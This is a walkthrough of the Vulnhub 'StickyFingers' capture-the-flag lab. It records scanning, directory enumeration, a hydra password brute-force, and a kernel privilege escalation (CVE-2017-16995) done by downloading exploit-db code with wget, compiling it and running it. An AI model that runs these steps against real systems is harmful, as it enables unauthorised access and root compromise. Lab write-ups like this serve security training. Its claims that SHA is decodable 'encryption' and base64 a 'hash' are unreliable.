Vulnhub Lab — StickyFingers (walkthrough)

Link — https://www.vulnhub.com/entry/bizarre-adventure-sticky-fingers,560/

Configuring Network Settings: To change the network settings of the “Vulnerable Web App” VM to use a bridged connection, follow these steps:

1. In VirtualBox, select the “Stickyfingers” VM from the list of VMs.
2. Click on the “Settings” button in the toolbar or right-click on the VM and select “Settings.”
3. In the “Settings” window, select the “Network” tab.
4. Under the “Attached to” drop-down menu, choose “Bridged Adapter.”
5. From the “Name” drop-down menu, select the network interface that you want to bridge the VM to. This should be the network interface connected to your physical network.
6. Click “OK” to save the changes.

Firstly, we will do Network Discovery scan using this command ,

sudo netdiscover -P -i eth0 -r 192.168.1.0/24

Press enter or click to view image in full size

We got the IP address of the machine which we have to pentest,From this ip what we can do is NMAP scan

To scan the ip for all ports with details , run this command

sudo nmap -A -sS -sV 192.168.1.38

Press enter or click to view image in full size

The scan shows us Three open ports: ssh port 22 | Domain port 53 | Http port 80

Beginning with Http , browse the ip in web browser.when we get browser access to any target ip.

Press enter or click to view image in full size

one thing which come to our mind is searching for subdomains of it,For that we can use “Dirb” web scanner tool using this command

dirb http://192.168.1.38/

Lets enumerate each founded directory and look for clues to the FLAG

http://192.168.1.38/admin/

Press enter or click to view image in full size

Need Credentials…, moving forward and check other directory maybe we can find something to get into admin account

http://192.168.1.38/images/ this directory contains file name Flag.txt.txt

Press enter or click to view image in full size

Rendering the wepage, on Inspecting I got two names ‘Zipperman’ and ‘Bucciarati’ , write them in a file for future use . we have two name , it maybe the usernames for admin login.Use hydra to search for public passwords for the adminpage

Press enter or click to view image in full size

I done the above shown scan somewhat fast, it may take 2–3 hours for finding the credential.Now , we have username and password lets login to admin page and see what it contains

Press enter or click to view image in full size

Looking wired, but it contains a long string……..what should we do with that????

ODBlNDEzMDQwNzFjYmY1ODU2NTM2ZTM5MGYzYzc3ZjQ0NWE0OGVjMDE3NzQwNzdiOGM2ODNlMzA5YzUzMTMyOQ==

Use CYBERCHEF to bake it and see what it actually means

Press enter or click to view image in full size

Press enter or click to view image in full size

Magic tool shows the string is encoded in base64 hash, Lets analyse the hash with analyse hash tool

Based on analysis , we get to know the string is encoded with SHA encryption, use any online available tool to decode it.

Press enter or click to view image in full size

Password : 1Password1*

we have a new credential , Try to ssh with remainng username ‘Bucciarati’ with the new password

Press enter or click to view image in full size

type username in small letters

4.1.0– 19-generic version is bit old, maybe we can have any vulnerability in it. Perform web search about the version and check if you get something usefull (Information gathering phase)

cve-2017–16995 shows some vuln in the same version which we are looking for

Press enter or click to view image in full size

steps:

wget https://www.linkedin.com/redir/general-malware-page?url=https%3A%2F%2Fwww%2eexploit-db%2ecom%2Fraw%2F45010 -O final.c

gcc -s final.c -o final2

./final2

Press enter or click to view image in full size

FLAG{JoJ0sZ_B1Z4RrR3_AddV3nT9R3_}